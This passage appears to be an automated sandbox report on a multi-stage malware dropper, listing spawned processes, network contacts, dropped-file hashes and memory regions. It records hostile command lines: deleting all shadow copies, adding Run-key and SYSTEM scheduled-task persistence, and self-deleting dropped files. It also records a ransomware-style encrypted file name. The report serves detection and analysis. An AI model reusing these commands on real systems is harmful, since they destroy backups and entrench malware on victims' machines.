PID 3016 wrote to memory of 792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 3016 wrote to memory of 792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 3016 wrote to memory of 792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 3016 wrote to memory of 792 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\12.exe
PID 3016 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\13.exe
PID 3016 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\13.exe
PID 3016 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\13.exe
PID 3016 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\13.exe
PID 3016 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\14.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\31.exe

"C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BEBD.tmp\BEBE.tmp\BEBF.bat C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Program Files\Java\jre7\bin\javaw.exe

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\7.exe

C:\Windows\SysWOW64\wininit.exe

"C:\Windows\SysWOW64\wininit.exe"

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Users\Admin\AppData\Roaming\12.exe

C:\Users\Admin\AppData\Roaming\12.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\21.exe

C:\Users\Admin\AppData\Roaming\21.exe

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Users\Admin\AppData\Roaming\26.exe

C:\Users\Admin\AppData\Roaming\26.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Users\Admin\AppData\Roaming\30.exe

C:\Users\Admin\AppData\Roaming\30.exe

C:\Users\Admin\AppData\Roaming\31.exe

C:\Users\Admin\AppData\Roaming\31.exe

C:\Users\Admin\AppData\Roaming\21.exe

"{path}"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\2.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@1792

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\AppData\Roaming\24.exe

"{path}"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@1576

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0

C:\Windows\SysWOW64\svchost.exe

"C:\Windows\SysWOW64\svchost.exe"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\18.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe /C

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3E58.tmp"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4992 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\11.exe

"{path}"

C:\Users\Admin\AppData\Roaming\11.exe

"{path}"

C:\Users\Admin\AppData\Roaming\Microsoft\Ontoaqkeukiz\iqqbvppj.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Ontoaqkeukiz\iqqbvppj.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8076.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp672C.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn eauwvjln /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I eauwvjln" /SC ONCE /Z /ST 00:59 /ET 01:11

C:\Windows\SysWOW64\colorcpl.exe

"C:\Windows\SysWOW64\colorcpl.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Ontoaqkeukiz\iqqbvppj.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Ontoaqkeukiz\iqqbvppj.exe /C

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\11.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 telete.in udp
NL 193.34.166.247:443 tcp
US 199.59.243.227:443 telete.in tcp
NL 185.45.193.50:443 tcp
US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 199.59.243.227:443 telete.in tcp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
NL 93.115.21.29:443 tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
FR 92.204.160.54:443 tcp
FR 92.204.160.54:443 tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 8.8.8.8:53 www.dgx9.com udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
NL 2.56.213.179:443 tcp
NL 193.34.166.247:443 tcp
NL 45.153.186.47:443 tcp
US 8.8.8.8:53 www.relationshiplink.net udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 8.8.8.8:53 www.tillyaeva-lola.news udp
NL 93.115.21.29:443 tcp
US 8.8.8.8:53 www.yasasiite.salon udp
US 199.59.243.227:443 telete.in tcp
NL 2.56.213.179:443 tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
JP 183.90.238.45:80 www.yasasiite.salon tcp
NL 193.34.166.247:443 tcp
NL 185.45.193.50:443 tcp
NL 193.34.166.247:443 tcp
NL 45.153.186.47:443 tcp
US 8.8.8.8:53 www.yabbanet.com udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
NL 193.34.166.247:443 tcp
NL 193.34.166.247:443 tcp
US 8.8.8.8:53 www.dentalexpertstraining.com udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp

Files

C:\Users\Admin\AppData\Local\Temp\BEBD.tmp\BEBE.tmp\BEBF.bat

MD5 ba36077af307d88636545bc8f585d208
SHA1 eafa5626810541319c01f14674199ab1f38c110c
SHA256 bec099c24451b843d1b5331686d5f4a2beff7630d5cd88819446f288983bda10
SHA512 933c2e5de3bc180db447e6864d7f0fa01e796d065fcd8f3d714086f49ec2f3ae8964c94695959beacf07d5785b569fd4365b7e999502d4afa060f4b833b68d80

C:\Users\Admin\AppData\Roaming\1.jar

MD5 a5d6701073dbe43510a41e667aaba464
SHA1 e3163114e4e9f85ffd41554ac07030ce84238d8c
SHA256 1d635c49289d43e71e2b10b10fbb9ea849a59eacedfdb035e25526043351831c
SHA512 52f711d102cb50fafefc2a9f2097660b950564ff8e9324471b9bd6b7355321d60152c78f74827b05b6332d140362bd2c638b8c9cdb961431ab5114e01851fbe4

C:\Users\Admin\AppData\Roaming\2.exe

MD5 715c838e413a37aa8df1ef490b586afd
SHA1 4aef3a0036f9d2290f7a6fa5306228abdbc9e6e1
SHA256 4c21a70dbc6b9bc5e1ee1e7506ee205eecdb14cc45571423e6bcc86dbe4001e7
SHA512 af13c0efb1552bbfbb517e27ff70a00cba5c230e3d2e707bd28a9ccce40e0402793c4ecc32ba1418f19a3744b78b89e5c8709eae3ad5f883c474832c182de861

C:\Users\Admin\AppData\Roaming\3.exe

MD5 d2e2c65fc9098a1c6a4c00f9036aa095
SHA1 c61b31c7dbebdd57a216a03a3dc490a3ea9f5abd
SHA256 4d7421e6d0ac81e2292bcff52f7432639c4f434519db9cf2985b46a0069b2be8
SHA512 b5bd047ca4ee73965719669b29478a9d33665752e1dbe0f575a2da759b90819e64125675da749624b2d8c580707fd6a932685ab3962b5b88353981e857fe9793

C:\Users\Admin\AppData\Roaming\4.exe

MD5 ec7506c2b6460df44c18e61d39d5b1c0
SHA1 7c3e46cd7c93f3d9d783888f04f1607f6e487783
SHA256 4e36dc0d37ead94cbd7797668c3c240ddc00fbb45c18140d370c868915b8469d
SHA512 cf16f6e5f90701a985f2a2b7ad782e6e1c05a7b6dc0e644f7bdd0350f717bb4c9e819a8e9f383da0324b92f354c74c11b2d5827be42e33f861c233f3baab687e

C:\Users\Admin\AppData\Roaming\5.exe

MD5 4fcc5db607dbd9e1afb6667ab040310e
SHA1 48af3f2d0755f0fa644fb4b7f9a1378e1d318ab9
SHA256 6fb0eacc8a7abaa853b60c064b464d7e87b02ef33d52b0e9a928622f4e4f37c7
SHA512 a46ded4552febd7983e09069d26ab2885a8087a9d43904ad0fedcc94a5c65fe0124bbf0a7d3e7283cb3459883e53c95f07fa6724b45f3a9488b147de42221a26

memory/2752-102-0x0000000000400000-0x00000000004B0000-memory.dmp

memory/1556-101-0x0000000000400000-0x000000000042D000-memory.dmp

C:\Users\Admin\AppData\Roaming\6.exe

MD5 cf04c482d91c7174616fb8e83288065a
SHA1 6444eb10ec9092826d712c1efad73e74c2adae14
SHA256 7b01d36ac9a77abfa6a0ddbf27d630effae555aac9ae75b051c6eedaf18d1dcf
SHA512 3eca1e17e698c427bc916465526f61caee356d7586836b022f573c33a6533ce4b4b0f3fbd05cc2b7b44568e814121854fdf82480757f02d925e293f7d92a2af6

memory/1200-107-0x0000000000010000-0x0000000000020000-memory.dmp

C:\Users\Admin\AppData\Roaming\7.exe

MD5 42d1caf715d4bd2ea1fade5dffb95682
SHA1 c26cff675630cbc11207056d4708666a9c80dab5
SHA256 8ea389ee2875cc95c5cd2ca62ba8a515b15ab07d0dd7d85841884cbb2a1fceea
SHA512 b21a0c4b19ffbafb3cac7fad299617ca5221e61cc8d0dca6d091d26c31338878b8d24fe98a52397e909aaad4385769aee863038f8c30663130718d577587527f

memory/3064-112-0x0000000000290000-0x00000000002A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\11.exe

MD5 9d4da0e623bb9bb818be455b4c5e97d8
SHA1 9bc2079b5dd2355f4d98a2fe9879b5db3f2575b0
SHA256 091ff5f5bab1cbb2d27a32fedaff1f64dd4004e4a68665e8d606e28585d928a8
SHA512 6e6fab5f4a045349717762ff782527e778b40c5f41ce32428c63aea0dd6e8b73bfdaf3ac55474275f716e9f84632906196edafc4337d816055a69b2ea0904e37

C:\Users\Admin\AppData\Roaming\9.exe

MD5 ea88f31d6cc55d8f7a9260245988dab6
SHA1 9e725bae655c21772c10f2d64a5831b98f7d93dd
SHA256 33f77b1bca36469dd734af67950223a7b1babd62a25cb5f0848025f2a68b9447
SHA512 5952c4540b1ae5f2db48aaae404e89fb477d233d9b67458dd5cecc2edfed711509d2e968e6af2dbb3bd2099c10a4556f7612fc0055df798e99f9850796a832ad

memory/1792-127-0x00000000031C0000-0x0000000003437000-memory.dmp

C:\Users\Admin\AppData\Roaming\10.exe

MD5 68f96da1fc809dccda4235955ca508b0
SHA1 f182543199600e029747abb84c4448ac4cafef82
SHA256 34b63aa5d2cff68264891f11e8d6875a38ff28854e9723b1db9c154a5abe580c
SHA512 8512aa47d9d2062a8943239ab91a533ad0fa2757aac8dba53d240285069ddbbff8456df20c58e063661f7e245cb99ccbb49c6f9a81788d46072d5c8674da40f7

C:\Users\Admin\AppData\Roaming\8.exe

MD5 dea5598aaf3e9dcc3073ba73d972ab17
SHA1 51da8356e81c5acff3c876dffbf52195fe87d97f
SHA256 8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c
SHA512 a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

C:\Users\Admin\AppData\Roaming\12.exe

MD5 192830b3974fa27116c067f019747b38
SHA1 469fd8a31d9f82438ab37413dae81eb25d275804
SHA256 116e5f36546b2ec14aba42ff69f2c9e18ecde3b64abb44797ac9efc6c6472bff
SHA512 74ebe5adb71c6669bc39fc9c8359cc6bc9bb1a77f5de8556a1730de23104fe95ec7a086c19f39706286b486314deafd7e043109414fd5ce0584f2fbbc6d0658a

C:\Users\Admin\AppData\Roaming\13.exe

MD5 349f49be2b024c5f7232f77f3acd4ff6
SHA1 515721802486abd76f29ee6ed5b4481579ab88e5
SHA256 262d38348a745517600abe0719345c6d17c8705dd3b4d67e7a545a94b9388b60
SHA512 a6c9a96c7738f6408c28b1579009167136ce9d3d68deb4c02f57324d800bce284f5d63a9d589651e8ab37b2ac17bf94e9bd59c63aaa3b66f0891e55ba7d646a0

C:\Users\Admin\AppData\Roaming\21.exe

MD5 9a7f746e51775ca001efd6ecd6ca57ea
SHA1 7ea50de8dd8c82a7673b97bb7ccd665d98de2300
SHA256 c4c308629a06c9a4af93fbd747ed2421e2ff2460347352366e51b91d19737400
SHA512 20cd6af47a92b396ae565e0a21d3acaa0d3a74bcdccc1506a55dea891da912b03256ba9900c2c089fe44d71210e3c100ba4601cf4d6c9b492a2ce0d323d4c57f

C:\Users\Admin\AppData\Roaming\19.exe

MD5 ff96cd537ecded6e76c83b0da2a6d03c
SHA1 ec05b49da2f8d74b95560602b39db3943de414cb
SHA256 7897571671717742304acde430e5959c09fd9c29fbbe808105f00a1f663927ac
SHA512 24a827fda9db76c030852ef2db73c6b75913c9ee55e130a3c9a7c6ff7aff0fb7192ff1c47cd266b91500a04657b2da61a5fc00e48e7fbc27a6cbc9b7d91daa4b

C:\Users\Admin\AppData\Roaming\17.exe

MD5 15a05615d617394afc0231fc47444394
SHA1 d1253f7c5b10e7a46e084329c36f7692b41c6d59
SHA256 596566f6cb70d55b1b0978a0fab4cffd5049559545fe7ee2fa3897ccbc46c013
SHA512 6deea7c0c3795de7360b11fa04384e0956520a3a7bf5405d411b58487a35bba51eaca51c1e2dda910d4159c22179a9161d84da52193e376dfdf6bdfbe8e9f0f1

C:\Users\Admin\AppData\Roaming\15.exe

MD5 d43d9558d37cdac1690fdeec0af1b38d
SHA1 98e6dfdd79f43f0971c0eaa58f18bce0e8cbf555
SHA256 501c921311164470ca8cb02e66146d8e3f36baa54bfc3ecb3a1a0ed3186ecbc5
SHA512 9a357c1bbc153ddc017da08c691730a47ab0ff50834cdc69540ede093d17d432789586d8074a4a8816fb1928a511f2a899362bb03feab16ca231adfdc0004aca

C:\Users\Admin\AppData\Roaming\31.exe

MD5 4c4f3c4c8145b2bb3f79dc1a79f013a9
SHA1 9b1d80f6f950d30d134537f16f1f24fb66a41543
SHA256 f9f9b4e7abf29743486aeb210d474fee24b38a0e2f97d082ab0fe3dabc14b47b
SHA512 7c842577871a8bdf80a3da9dad91dea92dce764c00c874c821cbe2998a0a9d9921f0efb28bd5465deef02a6a6fdcb682a75b25976d7fac421fad8bf39d1c6c37

C:\Users\Admin\AppData\Roaming\29.exe

MD5 0009efe13eaf4dd3d091bc6e9ca7c1e7
SHA1 f2be84149784db1d1b7746afde07d781805bd35f
SHA256 de30d86cff3d838162aa88112a946dfb3af84005dda6bbc70cee15e8dff70ba3
SHA512 cf96410d5a528b52d92c37fac77ff3a8326ad6c2b3bbe00b44d55c758c5521870b9149b2fe8f743e6e7d90259eab5b3d19ed253abb8bea7660530c9b9ea70405

C:\Users\Admin\AppData\Roaming\27.exe

MD5 3d2c6861b6d0899004f8abe7362f45b7
SHA1 33855b9a9a52f9183788b169cc5d57e6ad9da994
SHA256 dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064
SHA512 19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

C:\Users\Admin\AppData\Roaming\25.exe

MD5 4bbcdf7f9deb1025ca56fa728d1fff48
SHA1 bdc80dfb759c221a850ac29664a27efd8d718a89
SHA256 d2c49ce7e49109214a98eaa2d39f0749c1e779bd139af1cadae55e1ccb55753b
SHA512 ea78c4935864dcddbf6f0516e1d5c095c4814ac988ccc038d0dc11c1fab7127ded45ff35b12bad845422c20f45311101706f0ef14cb1d629277ae276a2535383

C:\Users\Admin\AppData\Roaming\23.exe

MD5 0dca3348a8b579a1bfa93b4f5b25cddd
SHA1 1ee1bcfd80cd7713093f9c053ef2d8c2cd673cd7
SHA256 c430a15c1712a571b0cd3ed0e5dfeefa7e78865a91bdc12e66666cd37c0e9654
SHA512 f0a17a940dd1c956f2578ed852e94631a9762fdd825ed5160b3758e427e8efa2ff0bfc83f239976b1d2765fefc8f9182e41c2da8f5746b36d4b7d189cb14a1b8

C:\Users\Admin\AppData\Roaming\18.exe

MD5 bf15960dd7174427df765fd9f9203521
SHA1 cb1de1df0c3b1a1cc70a28629ac51d67901b17aa
SHA256 9187706072f008a27c26421791f57ec33a59b44b012500b2db3eeb48136fb2da
SHA512 7e8b9907233234440135f27ad813db97e20790baf8cb92949ae9185fa09cb4b7b0da35b6da2b33f3ac64a33545f32f959d90d73f7a6a4f14988c8ac3fd005074

C:\Users\Admin\AppData\Roaming\16.exe

MD5 56ba37144bd63d39f23d25dae471054e
SHA1 088e2aff607981dfe5249ce58121ceae0d1db577
SHA256 307077d1a3fd2b53b94d88268e31b0b89b8c0c2ee9dbb46041d3e2395243f1b3
SHA512 6e086bea3389412f6a9fa11e2caa2887db5128c2ad1030685e6841d7d199b63c6d9a76fb9d1ed9116afd851485501843f72af8366537a8283de2f9ab7f3d56f0

C:\Users\Admin\AppData\Roaming\14.exe

MD5 9acd34bcff86e2c01bf5e6675f013b17
SHA1 59bc42d62fbd99dd0f17dec175ea6c2a168f217a
SHA256 384fef8417014b298dca5ae9e16226348bda61198065973537f4907ac2aa1a60
SHA512 9de65becdfc9aaab9710651376684ee697015f3a8d3695a5664535d9dfc34f2343ce4209549cbf09080a0b527e78a253f19169d9c6eb6e4d4a03d1b31ded8933

memory/2140-175-0x0000000000400000-0x0000000002DF6000-memory.dmp

C:\Users\Admin\AppData\Roaming\30.exe

MD5 fc44b935b0188657684c40113f7ab81c
SHA1 76c4a1262eb49daa55a24aadd7e3a48f2c22abd2
SHA256 f5b2489109d68b6ac83b453b8df1c7e1e9ec2636e162efdbaab4d27c1ce2dd69
SHA512 95cdf42503a546b8c3de9c1d0f0ffc5fca9955739591e011ec1dfd8b5c83492bc14261bbb042275f281cc12b59edb071e3dd72dad64c11481d118910a6052f9a

C:\Users\Admin\AppData\Roaming\28.exe

MD5 2ef457653d8aeb241637c8358b39863f
SHA1 578ed06d6c32c44f69a2c2454f289fb0a5591f30
SHA256 dcffe599c886878ed4bed045140bd13d7bc9bd5085163ea00857aa09a93f4060
SHA512 16f98c1d29b8cfaaf3003c5264ca6b4363764c351d5106919eaf2c3bfab26e0fb189dd0e0b82b4d294ba5f3fe535d71cd25c93c2bf9fd27d84c2dd0a2bc99b69

C:\Users\Admin\AppData\Roaming\26.exe

MD5 c3da5cb8e079024e6d554be1732c51cf
SHA1 e8f4499366fe67c9ae6fd1f5acbf56a9b956d4c3
SHA256 d7479a2f9f080742d17077fb4ccfc24583fa7a35842ba505cd43ed266734ce1f
SHA512 2395e084aef01c2a3f18524ee2c860f21e785849ce588a6ac7f58b45b6f7ba6dd25c052c49cc41dd72b3ebb7d476d88787aa273af82afc6fe17eb9e0ad4d7043

C:\Users\Admin\AppData\Roaming\24.exe

MD5 43728c30a355702a47c8189c08f84661
SHA1 790873601f3d12522873f86ca1a87bf922f83205
SHA256 cecdf155db1d228bc153ebe762d7970bd6a64e81cf5f977343f906a1e1d56e44
SHA512 b2d0882d5392007364e5f605c405b98a375e34dec63be5d16d9fae374313336fa13edbb6b8894334afb409833ffc0dbbc9be3d7b4263bdf5b77dbff9f2182e1e

C:\Users\Admin\AppData\Roaming\22.exe

MD5 48e9df7a479e3fd63064ec66e2283a45
SHA1 a8dcce44de655a97a3448758b397a37d1f7db549
SHA256 c7d8c3c379dcc42fa796b07b6a9155826d39cbd2f264bc68d22a63b17c8ef7df
SHA512 6cc839f118cad9982ec998665b409dc297a8cff9b23ec2a9105d15cf58d9adbf46d0048dda76c8e1574f6288d901912b7de373920b68b53dbda43d6075611016

C:\Users\Admin\AppData\Roaming\20.exe

MD5 ddcdc714bedffb59133570c3a2b7913f
SHA1 d21953fa497a541f185ed87553a7c24ffc8a67ce
SHA256 be3e6008dde30cb959b90a332a79931b889216a9483944dc5c0d958dec1b8e46
SHA512 a1d728751490c6cf21f9597c6df6f8db857c28d224b2d03e6d25ce8f17557accbd8ef2972369337b9d3305d5b9029001e5300825c23ce826884dcee55b37562c

memory/948-189-0x0000000005040000-0x0000000005098000-memory.dmp

memory/948-188-0x0000000000900000-0x0000000000908000-memory.dmp

memory/1668-187-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1668-186-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1668-185-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1668-184-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1668-182-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1668-180-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1668-178-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1668-176-0x0000000000400000-0x000000000044E000-memory.dmp

memory/948-173-0x0000000000F10000-0x0000000000FCE000-memory.dmp

memory/2888-172-0x0000000000CF0000-0x0000000000D0A000-memory.dmp

memory/2140-170-0x00000000002B0000-0x00000000003B0000-memory.dmp

memory/1556-162-0x0000000000400000-0x000000000042D000-memory.dmp

memory/1556-161-0x0000000000460000-0x0000000000474000-memory.dmp

memory/2204-191-0x0000000000400000-0x0000000002DF6000-memory.dmp

memory/1128-198-0x00000000003A0000-0x000000000044C000-memory.dmp

memory/2344-216-0x0000000000D00000-0x0000000000E84000-memory.dmp

memory/2056-214-0x0000000000D80000-0x0000000000E18000-memory.dmp

memory/824-213-0x00000000005B0000-0x00000000005DD000-memory.dmp

memory/824-210-0x0000000000DB0000-0x0000000000DF0000-memory.dmp

memory/824-209-0x0000000000D20000-0x0000000000D72000-memory.dmp

memory/824-208-0x0000000000E00000-0x0000000000E6E000-memory.dmp

memory/832-205-0x00000000011C0000-0x000000000122A000-memory.dmp

memory/1792-200-0x0000000000400000-0x000000000300E000-memory.dmp

memory/832-226-0x0000000004630000-0x0000000004688000-memory.dmp

memory/2056-229-0x0000000000630000-0x0000000000692000-memory.dmp

memory/2344-227-0x00000000003F0000-0x00000000003F6000-memory.dmp

memory/1576-231-0x0000000003390000-0x0000000003607000-memory.dmp

memory/2344-234-0x000000000D920000-0x000000000DABA000-memory.dmp

memory/3064-243-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2696-239-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2304-259-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2304-258-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2304-257-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2304-256-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2304-254-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2304-252-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2304-250-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2304-248-0x0000000000400000-0x0000000000452000-memory.dmp

memory/2344-247-0x0000000000690000-0x0000000000696000-memory.dmp

memory/2056-244-0x00000000024D0000-0x0000000002526000-memory.dmp

memory/1576-246-0x0000000000400000-0x000000000301E000-memory.dmp

memory/824-237-0x00000000005B0000-0x00000000005DD000-memory.dmp

memory/1484-517-0x00000000021E0000-0x000000000244B000-memory.dmp

memory/1256-516-0x00000000022F0000-0x000000000255B000-memory.dmp

memory/1128-518-0x0000000000470000-0x0000000000484000-memory.dmp

C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveLR.cab.id-D45DEC0D.[[email protected]].BOMBO

MD5 b68301471e47fda8dd3bb11e14676913
SHA1 b2ae8a813699014b79897d4937de84ffbc75ce74
SHA256 7798a2d29c63047a7c44b3a26feb9bf068032da258dedded0f61538ffb1109eb
SHA512 41dff2f60bf1cd9f5fddda0d43feaa2c95859c80bb03cb66860fd2bceee316b51d47925ae99dca474dad52db1dd19ad1dc092cda297e371289b1dd682d2fac3f

memory/1128-1089-0x0000000000480000-0x0000000000488000-memory.dmp

memory/3528-1698-0x0000000002100000-0x000000000236B000-memory.dmp

memory/3844-1697-0x0000000000B40000-0x0000000000B48000-memory.dmp

memory/2244-1727-0x0000000000020000-0x0000000000027000-memory.dmp

memory/1128-1745-0x00000000005B0000-0x00000000005B8000-memory.dmp

memory/1128-1814-0x00000000005C0000-0x00000000005C8000-memory.dmp

memory/3512-2954-0x0000000000400000-0x0000000000452000-memory.dmp

